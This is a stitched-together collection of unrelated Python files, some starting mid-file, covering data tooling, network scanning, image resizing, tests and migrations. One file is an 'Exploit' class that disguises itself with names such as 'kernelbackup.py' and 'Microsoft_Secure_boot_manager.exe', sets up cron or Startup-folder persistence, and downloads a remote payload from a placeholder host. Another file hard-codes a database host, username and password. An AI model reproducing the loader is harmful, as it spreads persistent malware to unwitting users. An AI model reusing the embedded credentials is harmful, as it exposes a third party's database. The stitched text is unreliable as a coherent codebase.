    flattened tensor values) and ``shape`` (the per-item dimensions); see
    :meth:`make_from_data_shape_arrays`.
    """
    @classmethod
    def __arrowbic_ext_type_class__(cls) -> Type[BaseExtensionType]:
        # Imported locally to avoid a circular import with the type module.
        from .tensor_type import TensorType

        return TensorType
    def __arrowbic_getitem__(self, index: int) -> Optional[NdArrayGeneric]:
        """Arrowbic __getitem__ interface, to retrieve a single Numpy NdArray item in an array.
        Args:
            index: Index of the item to retrieve.
        Returns:
            Item (or None if null entry).
        """
        # field(0) is the flat `data` list; a null slot means a null tensor.
        raw_data = self.storage.field(0)[index]
        if not raw_data.is_valid:
            return None
        # Slicing directly the raw Numpy data.
        # zero_copy_only=True means to_numpy raises rather than copies, so the
        # reshaped result below is a view over the Arrow buffer.
        raw_values = self.storage.field(0).values.to_numpy(zero_copy_only=True)
        raw_offsets = self.storage.field(0).offsets.to_numpy(zero_copy_only=True)
        # field(1) is the `shape` list for this item.
        shape = self.storage.field(1)[index].as_py()
        data = raw_values[raw_offsets[index] : raw_offsets[index + 1]].reshape(shape)
        return data
    @classmethod
    def make_from_data_shape_arrays(
        cls: Type[TArray],
        data_arr: pa.ListArray,
        shape_arr: pa.ListArray,
        *,
        mask: Optional[pa.BooleanArray] = None,
        registry: Optional[ExtensionTypeRegistry] = None,
    ) -> TArray:
        """Build a Tensor extension array from raw data and shape Arrow arrays (as flat list).
        Args:
            data_arr: Flat data Arrow array.
            shape_arr: Flat shape Arrow array.
            mask: Optional boolean mask array.
            registry: Optional Arrowbic registry to use.
        Returns:
            Tensor extension array.
        """
        # Pack data + shape into the struct storage expected by the ext type.
        storage_arr = pa.StructArray.from_arrays([data_arr, shape_arr], ["data", "shape"], mask=mask)
        ext_tensor_type = find_registry_extension_type(np.ndarray, storage_arr.type, registry=registry)
        ext_tensor_arr = cls.from_storage(ext_tensor_type, storage_arr)
        return ext_tensor_arr
    @classmethod
    def from_iterator(
        cls: Type[TArray],
        it_items: Iterable[Optional[TItem]],
        /,
        *,
        size: Optional[int] = None,
        registry: Optional[ExtensionTypeRegistry] = None,
    ) -> TArray:
        """Build the extension array from a Python item iterator.
        Args:
            it_items: Items Python iterable.
            size: Optional size of the input iterable.
            registry: Optional registry where to find the extension type.
        Returns:
            Extension array, with the proper data.
        """
        # Thin override kept for the narrowed return type annotation.
        return super().from_iterator(it_items, size=size, registry=registry)  # type:ignore
    @classmethod
    def from_tensor(cls: Type[TArray], arr: NdArrayGeneric) -> TArray:
        """Build a tensor array from a single tensor, the first dimension being the array dimension.
        Args:
            arr: Data tensor (N0, N1, ...)
        Returns:
            Tensor array of length N0, with tensors of shape (N1, ...)
        """
        arr = np.asarray(arr)
        if arr.ndim < 2:
            raise ValueError(f"Input Numpy array with too few dimensions: '{arr.shape}'.")
        N = arr.shape[0]
        item_shape = arr.shape[1:]
        item_size = np.prod(item_shape)
        # Data array.
        # Every item has the same flattened length, so offsets are a simple
        # arithmetic progression over the raveled buffer.
        data_values = pa.array(np.ravel(arr))
        data_offsets = pa.array(np.arange(0, N * item_size + 1, item_size, dtype=np.int64))
        data_arr = pa.ListArray.from_arrays(data_offsets, data_values)
        # Shape array.
        # All N items share the same shape tuple.
        shape_arr = pa.array([item_shape] * N)
        return cls.make_from_data_shape_arrays(data_arr, shape_arr)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import itertools
import datetime
import django_rq
from ralph.util.network import ping
from ralph.discovery.http import get_http_family
from ralph.discovery.models import IPAddress, Network
from ralph.scan.snmp import get_snmp
from ralph.scan.errors import NoQueueError
ADDRESS_GROUP_SIZE = 32
def _split_into_groups(iterable, group_size):
    """Yield consecutive lists of *group_size* items from *iterable*.

    The final group may be shorter when the length is not a multiple.

    >>> list(_split_into_groups(range(10), 2))
    [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]]
    >>> list(_split_into_groups(range(10), 3))
    [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
    """
    # Group by integer position // group_size; enumerate supplies positions.
    grouped = itertools.groupby(
        enumerate(iterable),
        key=lambda pair: pair[0] // group_size,
    )
    for _, members in grouped:
        yield [value for _, value in members]
def autoscan_data_center(data_center):
    """Queues a scan of all scannable networks in the data center."""
    # Networks without a discovery queue are not scannable; skip them here
    # rather than letting autoscan_network raise.
    scannable_networks = data_center.network_set.exclude(queue=None)
    for network in scannable_networks:
        autoscan_network(network)
def autoscan_network(network):
    """Queues a scan of a whole network on the right worker."""
    if not network.queue:
        raise NoQueueError(
            "No discovery queue defined for network {0}.".format(network),
        )
    worker_queue = django_rq.get_queue(network.queue.name)
    # Enqueue the hosts in fixed-size batches to bound per-job work.
    host_groups = _split_into_groups(
        network.network.iterhosts(),
        ADDRESS_GROUP_SIZE,
    )
    for host_group in host_groups:
        worker_queue.enqueue_call(
            func=_autoscan_group,
            args=(host_group,),
            timeout=60,
            result_ttl=0,
        )
    network.last_scan = datetime.datetime.now()
    network.save()
def autoscan_address(address):
    """Queues a scan of a single address on the right worker."""
    # Network.from_ip raises IndexError when no configured network matches.
    try:
        network = Network.from_ip(address)
    except IndexError:
        raise NoQueueError(
            "Address {0} doesn't belong to any configured "
            "network.".format(address),
        )
    if not network.queue:
        raise NoQueueError(
            "The network {0} has no discovery queue.".format(network),
        )
    worker_queue = django_rq.get_queue(network.queue.name)
    worker_queue.enqueue_call(
        func=_autoscan_group,
        args=([address],),
        timeout=60,
        result_ttl=0,
    )
def _autoscan_group(addresses):
    """This is the function that actually gets queued during autoscanning."""
    # Scan each address in turn; failures propagate to the worker.
    for single_address in addresses:
        _autoscan_address(single_address)
def _autoscan_address(address):
    """Autoscans a single address on the worker."""
    try:
        ip_record = IPAddress.objects.get(address=address)
    except IPAddress.DoesNotExist:
        ip_record = None
    # Buried addresses are deliberately excluded from scanning.
    if ip_record and ip_record.is_buried:
        return
    if ping(address):
        if not ip_record:
            ip_record, created = IPAddress.objects.get_or_create(
                address=address,
            )
        # Host is up: refresh discovery data and reset the failure counter.
        ip_record.http_family = get_http_family(ip_record.address)
        (
            ip_record.snmp_name,
            ip_record.snmp_community,
            ip_record.snmp_version,
        ) = get_snmp(ip_record)
        ip_record.dead_ping_count = 0
        ip_record.save(update_last_seen=True)
    elif ip_record:
        # Host is down: clear discovery data and count the failed ping.
        ip_record.http_family = None
        ip_record.snmp_name = None
        ip_record.snmp_community = None
        ip_record.snmp_version = None
        ip_record.dead_ping_count += 1
        ip_record.save(update_last_seen=False)
|
import subprocess
from .utils import logging, cwd, run_process, data_types
logger = logging.getLogger(__name__)
data = cwd / '../../../inputs/meta_fb'
def build_vrt(name):
    """Collect every hrsl_<name> GeoTIFF into a single '-latest' VRT mosaic."""
    tif_paths = sorted((data / f'hrsl_{name}').rglob('*.tif'))
    subprocess.run([
        'gdalbuildvrt',
        '-q',
        data / f'hrsl_{name}/hrsl_{name}-latest.vrt',
        *tif_paths,
    ])
def merge_data(name):
    """Recompress the original hrsl_<name> rasters into tiled, DEFLATE-
    compressed Float32 GeoTIFFs, then rebuild the VRT mosaic."""
    for version in ('v1', 'v1.5'):
        (data / f'hrsl_{name}/{version}').mkdir(parents=True, exist_ok=True)
    for src in sorted((data / f'hrsl_{name}_original').rglob('*.tif*')):
        # Mirror the source path into the non-"_original" tree.
        dst = str(src).replace(f'/hrsl_{name}_original/', f'/hrsl_{name}/')
        subprocess.run([
            'gdal_translate',
            '-q',
            '--config', 'GDAL_NUM_THREADS', 'ALL_CPUS',
            '-co', 'TILED=YES',
            '-co', 'BLOCKXSIZE=512',
            '-co', 'BLOCKYSIZE=512',
            '-co', 'COMPRESS=DEFLATE',
            '-co', 'ZLEVEL=9',
            '-ot', 'Float32',
            src,
            dst,
        ])
        logger.info(src.name)
    build_vrt(name)
    logger.info(name)
def main():
    # Fan merge_data out over the datasets via the shared process runner.
    run_process(merge_data)
    logger.info('finished')
|
from sys import platform as _platform
from sys import exit as exit
from requests import get as load
from crontab import CronTab
import os
import getpass
class Exploit:
    # NOTE(security): this class installs OS-level persistence (cron job on
    # Linux, Startup folder on Windows) and downloads a remote payload.  The
    # URLs are placeholders (example.example), so this reads as a PoC/demo,
    # but it is malware-shaped code — do not deploy or "fix" casually.
    system = None
    username= "max"
    def __init__(self):
        # Record the platform and real username; bail out entirely on macOS.
        self.system=_platform
        self.username= getpass.getuser()
        if _platform == "darwin":
            exit()
    def addtoSystemstart(self):
        # Register the payload so it runs automatically at system start.
        if self.system=="linux":
            cron = CronTab(user=self.username)
            target = f"/home/{self.username}/kernelbackup.py"
            basic_command = f"* */2 * * * python3 /home/{self.username}/kernelbackup.py"
            # Check whether an identical cron entry already exists.
            cronIter= cron.find_command(f"python3 {target}")
            exsist=False
            for item in cronIter:
                if str(item) == basic_command:
                    print("crontab job already exist", item)
                    exsist=True
                    break
            if not exsist:
                # Create a new entry running every 2nd hour.
                job = cron.new(f"python3 /home/{self.username}/kernelbackup.py")
                job.hour.every(2)
                job.enable()
                cron.write()
            if not os.path.isfile(target):
                # NOTE(security): downloads and writes a remote script.
                data= load("https://example.example/test/startup.py")
                open(target, 'wb').write(data.content)
        elif self.system=="win32" or self.system=="win64":
            target = f"C:/Users/{self.username}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/Microsoft_Secure_boot_manager.exe"
            if not os.path.isfile(target):
                # NOTE(security): downloads and writes a remote executable.
                data= load("https://example.example/test/startup.exe", stream=True)
                open(target, 'wb').write(data.content)
        else:
            pass
if __name__ == "__main__":
    # NOTE(review): this `try` has no matching `except`/`finally`, so this
    # file is a SyntaxError and cannot run as-is.  Left unfixed on purpose
    # given the nature of the code (see security notes on Exploit).
    try:
        hack = Exploit()
        hack.addtoSystemstart()
import cv2
import numpy as np
import os
def resize_image(img, size):
    """Resize ``img`` to ``size`` while preserving its aspect ratio.

    The image is centred on a square zero (black) canvas whose side equals
    the larger input dimension, then the canvas is scaled to ``size``.
    Downscaling uses INTER_AREA, upscaling INTER_CUBIC.

    :param img: source image, HxW or HxWxC numpy array
    :param size: target (width, height) tuple passed to cv2.resize
    :return: resized image
    """
    h, w = img.shape[:2]
    c = img.shape[2] if len(img.shape) > 2 else 1
    if h == w:
        # BUG FIX: interpolation must be a keyword argument — the third
        # positional parameter of cv2.resize is `dst`, not `interpolation`.
        return cv2.resize(img, size, interpolation=cv2.INTER_AREA)
    dif = h if h > w else w
    # Shrinking (source larger than target) -> INTER_AREA, else INTER_CUBIC.
    interpolation = cv2.INTER_AREA if dif > (size[0] + size[1]) // 2 else cv2.INTER_CUBIC
    x_pos = (dif - w) // 2
    y_pos = (dif - h) // 2
    if len(img.shape) == 2:
        mask = np.zeros((dif, dif), dtype=img.dtype)
        mask[y_pos:y_pos + h, x_pos:x_pos + w] = img[:h, :w]
    else:
        mask = np.zeros((dif, dif, c), dtype=img.dtype)
        mask[y_pos:y_pos + h, x_pos:x_pos + w, :] = img[:h, :w, :]
    return cv2.resize(mask, size, interpolation=interpolation)
if __name__ == "__main__":
    src_path = 'updated_data/7.Adho Mukha Svanasana/'
    dst_path = 'updated_data/Resized_images/'
    # Make sure the output directory exists before writing into it.
    os.makedirs(dst_path, exist_ok=True)
    for file in os.listdir(src_path):
        print(file)
        img = cv2.imread(src_path + file)
        if img is None:
            # cv2.imread returns None (no exception) for unreadable/non-image
            # files — skip them instead of crashing in resize_image.
            print('skipping unreadable file:', file)
            continue
        img = resize_image(img, size=(750, 750))
        cv2.imwrite(dst_path + file, img)
|
from heapq import heappop, heappush
from sortedcontainers import SortedList
class Solution:
    def busiestServers(self, k: int, arrival: 'List[int]', load: 'List[int]') -> 'List[int]':
        """Return the ids of the servers that handled the most requests.

        Request i prefers server i % k; if that server is busy, the next free
        server clockwise takes it; if all are busy the request is dropped.

        Fixes over the previous version:
        * annotations are quoted so the class no longer raises NameError when
          ``List`` is not imported (``typing`` was never imported here);
        * the third-party ``sortedcontainers`` dependency is replaced by the
          stdlib two-heap solution (O(n log k)).
        """
        cnt = [0] * k
        # Min-heap of free server ids.  A server s freed while handling
        # request i is re-pushed as i + (s - i) % k so that popping the
        # smallest entry always yields the next free server clockwise from
        # the preferred slot i % k; `% k` recovers the real id.
        free = list(range(k))
        busy = []  # (finish_time, server_id) min-heap
        for i, (start, duration) in enumerate(zip(arrival, load)):
            while busy and busy[0][0] <= start:
                _, server = heappop(busy)
                heappush(free, i + (server - i) % k)
            if free:
                server = heappop(free) % k
                cnt[server] += 1
                heappush(busy, (start + duration, server))
        best = max(cnt)
        return [i for i, v in enumerate(cnt) if v == best]
|
"""
Wins that don’t fit any category
"""
import logging
log = logging.getLogger(__name__)
import curses
from . import Win
from theming import get_theme, to_curses_attr
class VerticalSeparator(Win):
    """
    A one-column window holding a single vertical line.  The line is drawn
    only on resize, never on plain refresh, for efficiency.
    """
    def __init__(self):
        Win.__init__(self)

    def rewrite_line(self):
        separator_attr = to_curses_attr(get_theme().COLOR_VERTICAL_SEPARATOR)
        self._win.vline(0, 0, curses.ACS_VLINE, self.height, separator_attr)
        self._refresh()

    def refresh(self):
        log.debug('Refresh: %s', self.__class__.__name__)
        self.rewrite_line()
class SimpleTextWin(Win):
    """A window that displays a fixed piece of pre-wrapped text."""
    def __init__(self, text):
        Win.__init__(self)
        self._text = text
        self.built_lines = []

    def rebuild_text(self):
        """
        Pre-wrap the text into display lines so refresh() has no work left
        beyond drawing.  Called on each resize.
        """
        self.built_lines = []
        for paragraph in self._text.split('\n'):
            remaining = paragraph
            while len(remaining) >= self.width:
                # Break at the last space that fits, or hard-cut at width.
                cut = remaining[:self.width].rfind(' ')
                if cut <= 0:
                    cut = self.width
                self.built_lines.append(remaining[:cut])
                remaining = remaining[cut:]
            self.built_lines.append(remaining)

    def refresh(self):
        log.debug('Refresh: %s', self.__class__.__name__)
        self._win.erase()
        for row, built_line in enumerate(self.built_lines):
            self.addstr_colored(built_line, row, 0)
        self._refresh()
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
def recommendcase(location,quality,compensate,dbcon,number):
    """
    Recommend the top-N most similar cases by keyword matching.

    location: np.array of location keywords (matched against `summary`)
    quality: np.array of quality keywords (matched against `summary`)
    compensate: np.array of compensation keywords (matched against `ask`
        and `results`)
    dbcon: DB-API connection (pymysql; `%s` placeholders are used, so this
        assumes the `format`/`pyformat` paramstyle — TODO confirm if another
        driver is ever passed)
    number: number of recommended cases to return

    Returns a DataFrame of the `number` highest-scoring cases; each keyword
    match contributes one point (`num`) to a case's score.

    Fixes over the previous version:
    * uses the `dbcon` parameter (the old code referenced a global `db`,
      so the function raised NameError outside that script);
    * the compensate loop now uses the compensate keyword (was quality[i]);
    * queries are parameterized instead of string-concatenated (SQL
      injection via keyword contents);
    * deprecated DataFrame.append replaced with pd.concat;
    * an all-empty keyword input no longer breaks the final iloc selection.
    """
    import pandas as pd

    def _match(column, keyword):
        # One point per row whose `column` contains `keyword`.  `column` is
        # an internal literal, never user input; the keyword is bound as a
        # query parameter.
        sql = ("SELECT caseid, summary, 1 as num "
               "FROM product_dispute.summary_case "
               "WHERE " + column + " like %s")
        return pd.read_sql_query(sql, dbcon, params=('%' + keyword + '%',))

    frames = []
    for keyword in location:
        frames.append(_match('summary', keyword))
    for keyword in quality:
        frames.append(_match('summary', keyword))
    for keyword in compensate:
        frames.append(_match('ask', keyword))
        frames.append(_match('results', keyword))
    if frames:
        caseset = pd.concat(frames, ignore_index=True)
    else:
        caseset = pd.DataFrame(columns=('caseid', 'summary', 'num'))
    # Sum the per-match points per case (the object-dtype summary column is
    # concatenated by sum(), matching the original behaviour).
    recommend = caseset.groupby('caseid').sum().sort_values('num', ascending=False)
    recommend['caseid'] = recommend.index
    return recommend.iloc[:number, [1, 2]]
# In[2]:
if __name__ == '__main__':  # BUG FIX: was 'main', which never matches
    import pymysql
    import numpy as np
    # NOTE(security/review): database credentials are hard-coded in source;
    # move them to environment variables or a config file.
    db = pymysql.connect(
        host="cdb-74dx1ytr.gz.tencentcdb.com",
        user="root",
        passwd="sufelaw2019",
        port=10008,
        db = 'product_dispute')
    location = np.array(['市场'])
    quality = np.array(['过期', '超过保质期'])
    compensate = np.array(['医药费'])
    recommendcase(location,quality,compensate,db,2)##return a dataframe of summary and index
|
from analyze.calc_run import *
base = 'G:/Prive/MIJN-Documenten/TU/62-Stage/20180130-l/'

d = -5  # delay applied to every run

# One entry per measurement run.  All runs share the same scope settings,
# measurement length, current scaling and delay; they differ only in name,
# reactor geometry, voltage offset, and whether scope waveforms are parsed
# (the non-"a" runs passed scope_dir=None — original comment: "disable
# waveform parse").
RUNS = [
    # (run name, reactor, voltage_offset, parse_waveforms)
    ('run1', REACTOR_GLASS_SHORT_QUAD, 30, False),
    ('run2', REACTOR_GLASS_SHORT_QUAD, 30, False),
    ('run3', REACTOR_GLASS_LONG, 80, False),
    ('run4', REACTOR_GLASS_LONG, 80, False),
    ('run1a', REACTOR_GLASS_SHORT_QUAD, 30, True),
    ('run2a', REACTOR_GLASS_SHORT_QUAD, 30, True),
    ('run3a', REACTOR_GLASS_LONG, 80, True),
    ('run4a', REACTOR_GLASS_LONG, 80, True),
]

for run_name, reactor, v_offset, parse_waveforms in RUNS:
    # Omitting scope_dir keeps calc_run's default (waveform parsing on);
    # scope_dir=None disables waveform parsing, as in the original script.
    extra = {} if parse_waveforms else {'scope_dir': None}
    calc_run(base + run_name,
             reactor,
             scope_multiple=True,
             scope_file_name_index=2,  # length
             meas=SHORT_MEAS_LEN,
             current_scaling=0.5,
             delay=d,
             voltage_offset=v_offset,
             **extra)
"""Test the more robust put_item logic."""
import pytest
from . import tmp_dir_fixture # NOQA
try:
from unittest.mock import MagicMock
except ImportError:
from mock import MagicMock
def test_get_object_failure():
    """
    Mock scenario where the get fails.
    """
    from botocore.exceptions import WaiterError
    from dtool_s3.storagebroker import _object_exists

    # The ObjectExists waiter gives up -> _object_exists must report False.
    waiter_error = WaiterError('ObjectExists', 'Max attempts exceeded', {})
    obj = MagicMock(wait_until_exists=MagicMock(side_effect=waiter_error))
    mock_s3resource = MagicMock(Object=MagicMock(return_value=obj))

    value = _object_exists(mock_s3resource, "dummy_bucket", "dummy_dest_path")
    assert value is False
def test_get_object_success():
    """
    Mock scenario where the get succeeds.
    """
    from dtool_s3.storagebroker import _object_exists

    obj = MagicMock()
    mock_s3resource = MagicMock(Object=MagicMock(return_value=obj))

    value = _object_exists(mock_s3resource, "dummy_bucket", "dummy_dest_path")

    # The waiter must have been consulted exactly once.
    obj.wait_until_exists.assert_called_once()
    assert value is True
def test_upload_file_simulating_successful_upload():
    """
    Mock scenario where upload simply succeeds.
    """
    from dtool_s3.storagebroker import _upload_file  # NOQA

    s3client = MagicMock(upload_file=MagicMock(return_value=True))
    value = _upload_file(
        s3client,
        "dummy_fpath",
        "dummy_bucket",
        "dummy_dest_path",
        "dummy_extra_args",
    )
    assert value is True
def test_upload_file_simulating_nosuchupload_failure(tmp_dir_fixture): # NOQA
    """
    Mock scenario where upload fails with a NoSuchUpload exception.
    """
    from dtool_s3.storagebroker import _upload_file  # NOQA
    import boto3
    # Canned botocore error payload for a NoSuchUpload client error.
    error_response = {'Error': {'Code': 'NoSuchUpload',
                     'Message': 'The specified multipart upload ' +
                                'does not exist. The upload ID might be ' +
                                'invalid, or the multipart upload might ' +
                                'have been aborted or completed.'}}
    # A real client is built only to obtain its exceptions namespace; its
    # upload_file is replaced, so no network traffic occurs.
    # NOTE(review): boto3.client may still need region configuration in the
    # environment — confirm in CI.
    s3client = boto3.client("s3")
    s3client.upload_file = MagicMock(
        side_effect=s3client.exceptions.NoSuchUpload(
            error_response,
            "AbortMultipartUpload")
    )
    value = _upload_file(
        s3client,
        "dummy_fpath",
        "dummy_bucket",
        "dummy_dest_path",
        "dummy_extra_args",
    )
    # _upload_file is expected to swallow the error and report failure.
    assert value is False
def test_upload_file_simulating_endpointconnectionerror(tmp_dir_fixture): # NOQA
    """
    Mock scenario where upload fails with a EndpointConnectionError exception.
    """
    from dtool_s3.storagebroker import _upload_file  # NOQA
    import boto3
    from botocore.exceptions import EndpointConnectionError
    # Real client, but upload_file is replaced — no network traffic occurs.
    s3client = boto3.client("s3")
    s3client.upload_file = MagicMock(
        side_effect=EndpointConnectionError(
            endpoint_url="dummy_bucket/dest_path")
    )
    value = _upload_file(
        s3client,
        "dummy_fpath",
        "dummy_bucket",
        "dummy_dest_path",
        "dummy_extra_args",
    )
    # Connection failures must be swallowed and reported as False.
    assert value is False
def test_upload_file_simulating_S3UploadFailedError(tmp_dir_fixture): # NOQA
    """
    Mock scenario where upload fails with a S3UploadFailedError exception.
    """
    from dtool_s3.storagebroker import _upload_file  # NOQA
    import boto3
    from boto3.exceptions import S3UploadFailedError
    # Real client, but upload_file is replaced — no network traffic occurs.
    s3client = boto3.client("s3")
    s3client.upload_file = MagicMock(
        # Raised with no message; only the exception type matters here.
        side_effect=S3UploadFailedError()
    )
    value = _upload_file(
        s3client,
        "dummy_fpath",
        "dummy_bucket",
        "dummy_dest_path",
        "dummy_extra_args",
    )
    assert value is False
def test_put_item_with_retry():
    # Import-only smoke test: checks the symbol exists and is importable.
    # NOTE(review): no behaviour is exercised; consider removing or merging
    # it into the tests below.
    from dtool_s3.storagebroker import _put_item_with_retry # NOQA
def test_put_item_with_retry_immediate_success():
    """
    Mock scenario where while doing a put, the upload succeeds without needing
    to retry.
    """
    import dtool_s3.storagebroker
    # NOTE(review): these assignments replace module attributes globally and
    # are never restored, so the patching leaks into later tests; prefer
    # mock.patch / pytest's monkeypatch to scope it to this test.
    dtool_s3.storagebroker._upload_file = MagicMock(return_value=True)
    dtool_s3.storagebroker._object_exists = MagicMock()
    dtool_s3.storagebroker._put_item_with_retry(
        "dummy_s3client",
        "dummy_s3resource",
        "dummy_fpath",
        "dummy_bucket",
        "dummy_dest_path",
        {}
    )
    # Upload succeeded, so the existence check must never run.
    dtool_s3.storagebroker._upload_file.assert_called()
    dtool_s3.storagebroker._object_exists.assert_not_called()
def test_put_item_with_retry_simulating_upload_error_item_uploaded():
    """
    Mock scenario where while doing a put, the upload fails with an ambiguous
    failure, however item has been successfully created in the bucket.
    """
    import dtool_s3.storagebroker
    # NOTE(review): module attributes are patched globally without
    # restoration (see note in the test above).
    dtool_s3.storagebroker._upload_file = MagicMock(return_value=False)
    dtool_s3.storagebroker._object_exists = MagicMock(return_value=True)
    dtool_s3.storagebroker._put_item_with_retry(
        "dummy_s3client",
        "dummy_s3resource",
        "dummy_fpath",
        "dummy_bucket",
        "dummy_dest_path",
        {}
    )
    # Ambiguous failure + object present -> exactly one attempt, one check.
    dtool_s3.storagebroker._upload_file.assert_called_once()
    dtool_s3.storagebroker._object_exists.assert_called_once()
def test_put_item_with_retry_simulating_upload_error_item_doesnt_exist():
    """
    Mock scenario where while doing a put, the upload fails, the object hasn't
    been created on the target, so the retry routine is engaged.
    """
    import dtool_s3.storagebroker
    max_retry_time = 10
    # NOTE(review): module attributes are patched globally without
    # restoration (see notes in the tests above).
    dtool_s3.storagebroker._upload_file = MagicMock(return_value=False)
    dtool_s3.storagebroker._object_exists = MagicMock(return_value=None)
    # Wrap the real function so recursive retries can be counted while the
    # original logic still executes.
    dtool_s3.storagebroker._put_item_with_retry = MagicMock(
        side_effect=dtool_s3.storagebroker._put_item_with_retry)
    with pytest.raises(dtool_s3.storagebroker.S3StorageBrokerPutItemError):
        dtool_s3.storagebroker._put_item_with_retry(
            s3client="dummy_s3client",
            s3resource="dummy_s3resource",
            fpath="dummy_fpath",
            bucket="dummy_bucket",
            dest_path="dummy_dest_path",
            extra_args={},
            max_retry_time=max_retry_time
        )
    # The routine must have retried and exhausted the retry-time budget.
    assert dtool_s3.storagebroker._put_item_with_retry.call_count > 1
    my_args = dtool_s3.storagebroker._put_item_with_retry.call_args
    args, kwargs = my_args
    assert kwargs['retry_time_spent'] >= max_retry_time
|
# Generated by Django 2.1.5 on 2019-01-19 09:25
import django.utils.timezone
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add `created` and `last_modified` timestamp fields to Motion."""

    dependencies = [("motions", "0018_auto_20190118_2101")]

    operations = [
        migrations.AddField(
            model_name="motion",
            name="created",
            field=models.DateTimeField(
                auto_now_add=True, default=django.utils.timezone.now
            ),
            # The default is only used to backfill existing rows during this
            # migration; preserve_default=False drops it from the field after.
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="motion",
            name="last_modified",
            field=models.DateTimeField(auto_now=True),
        ),
    ]
|
import gc
import platform
import sys
import pytest
from pyo3_pytests.objstore import ObjStore
# True under PyPy, which lacks sys.getrefcount — used to skip the test below.
PYPY = platform.python_implementation() == "PyPy"
@pytest.mark.skipif(PYPY, reason="PyPy does not have sys.getrefcount")
def test_objstore_doesnot_leak_memory():
    """Pushing an object many times must not leave extra references behind."""
    N = 10000
    message = b'\\(-"-;) Praying that memory leak would not happen..'
    refcount_before = sys.getrefcount(message)
    store = ObjStore()
    for _ in range(N):
        store.push(message)
    del store
    gc.collect()
    refcount_after = sys.getrefcount(message)
    assert refcount_after == refcount_before
|
from ... pyaz_utils import _call_az
def list():
    '''
    List all security assessment results.
    '''
    # NOTE: _call_az receives locals() as the CLI argument mapping — do not
    # introduce local variables in this body.  The name shadows builtins.list;
    # presumably intentional in this generated wrapper — verify upstream.
    return _call_az("az security assessment-metadata list", locals())
def show(name):
    '''
    Shows a security assessment.
    Required Parameters:
    - name -- name of the resource to be fetched
    '''
    # NOTE: locals() (i.e. the parameters) is forwarded as the CLI arguments;
    # do not add local variables in this body.
    return _call_az("az security assessment-metadata show", locals())
def create(description, display_name, name, severity, remediation_description=None):
    '''
    Creates a customer managed security assessment type.
    Required Parameters:
    - description -- Detailed string that will help users to understand the assessment and how it is calculated
    - display_name -- Human readable title for this object
    - name -- name of the resource to be fetched
    - severity -- Indicates the importance of the security risk if the assessment is unhealthy
    Optional Parameters:
    - remediation_description -- Detailed string that will help users to understand the different ways to mitigate or fix the security issue
    '''
    # NOTE: locals() (i.e. the parameters) is forwarded as the CLI arguments;
    # do not add local variables in this body.
    return _call_az("az security assessment-metadata create", locals())
def delete(name):
    '''
    Deletes a security assessment type and all it's assessment results.
    Required Parameters:
    - name -- name of the resource to be fetched
    '''
    # NOTE: locals() (i.e. the parameters) is forwarded as the CLI arguments;
    # do not add local variables in this body.
    return _call_az("az security assessment-metadata delete", locals())
|
import pickle
import argparse
import random
import matplotlib.pyplot as plt
import numpy as np
from math import floor
class MyEvaluation:
    """
    Recall/precision evaluation across Top-M recommendation sizes.

    Loads factor arrays (mu, shp, rte) saved by training iteration
    `iteration` and scores a random sample of test users.  A user's item
    scores are dot(shp[user]/rte[user], mu.T) — presumably the posterior
    mean of a Poisson/Gamma factorization model (TODO confirm against the
    trainer that produced these arrays).
    """
    def __init__(self, user_train, user_test, movie_train, movie_test, iteration,
                 sample_test=50, TOP_M_start=10, TOP_M_end=100, pred_type='out-of-matrix', seed=42):
        assert pred_type in ['in-matrix', 'out-of-matrix', 'both']
        self.folder = f"output-data/{iteration}"
        self.sample_test = sample_test
        self.TOP_M_start = TOP_M_start
        self.TOP_M_end = TOP_M_end
        self.pred_type = pred_type
        self.seed = seed
        # Set seed
        # NOTE(review): only numpy's RNG is seeded, but generate_test_set()
        # draws with the stdlib `random` module — the user sample is NOT
        # reproducible despite `seed`.  Consider random.seed(self.seed) too.
        np.random.seed(self.seed)
        self.rating_GroupForUser_TRAIN, self.rating_GroupForUser_TEST = user_train, user_test,
        self.rating_GroupForMovie_TRAIN, self.rating_GroupForMovie_TEST = movie_train, movie_test
        self.mu = np.load(f"./{self.folder}/mu.npy")
        self.shp = np.load(f"./{self.folder}/shp.npy")
        self.rte = np.load(f"./{self.folder}/rte.npy")
        # TODO: maybe float64 -> float32? Compare results if changed!
        # print(self.mu.dtype)
        # print(self.shp.dtype)
        # print(self.rte.dtype)
        # Group items separately
        self.cold_items_TRAIN, self.cold_items_TEST, self.noncold_items_TRAIN, self.noncold_items_TEST = self.group_items()
        # Generate test set
        self.test_set = self.generate_test_set()
        # Average Recalls and Precisions over all users of test set across the Top-M
        # TRAIN
        self.avg_recalls_in_matrix_TRAIN, self.avg_precisions_in_matrix_TRAIN = [], []
        self.avg_recalls_out_of_matrix_TRAIN, self.avg_precisions_out_of_matrix_TRAIN = [], []
        # TEST
        self.avg_recalls_in_matrix_TEST, self.avg_precisions_in_matrix_TEST = [], []
        self.avg_recalls_out_of_matrix_TEST, self.avg_precisions_out_of_matrix_TEST = [], []
        # Update them accordingly
        self.avg_recall_precision()
    def group_items(self) -> list:
        """Number of cold items - 5,577/25,900 || Number of noncold items - 20,323/25,900"""
        # An item is "cold" in a split when it has no ratings in that split.
        cold_items_TRAIN, cold_items_TEST = [], []
        noncold_items_TRAIN, noncold_items_TEST = [], []
        for movie_id in self.rating_GroupForMovie_TRAIN:
            if len(self.rating_GroupForMovie_TRAIN[movie_id]) != 0:
                noncold_items_TRAIN.append(movie_id)
            else:
                cold_items_TRAIN.append(movie_id)
        for movie_id in self.rating_GroupForMovie_TEST:
            if len(self.rating_GroupForMovie_TEST[movie_id]) != 0:
                noncold_items_TEST.append(movie_id)
            else:
                cold_items_TEST.append(movie_id)
        print(f"Training set: cold-{len(cold_items_TRAIN)}, noncold-{len(noncold_items_TRAIN)}")
        print(f"Testing set: cold-{len(cold_items_TEST)}, noncold-{len(noncold_items_TEST)}")
        return cold_items_TRAIN, cold_items_TEST, noncold_items_TRAIN, noncold_items_TEST
    def generate_test_set(self) -> list:
        # Sample users, then keep only those rated in BOTH splits so the
        # recall denominators in the predict_* methods are never zero.
        sample = random.sample(list(self.rating_GroupForUser_TEST.keys()), self.sample_test)
        test_set = []
        for u in sample:
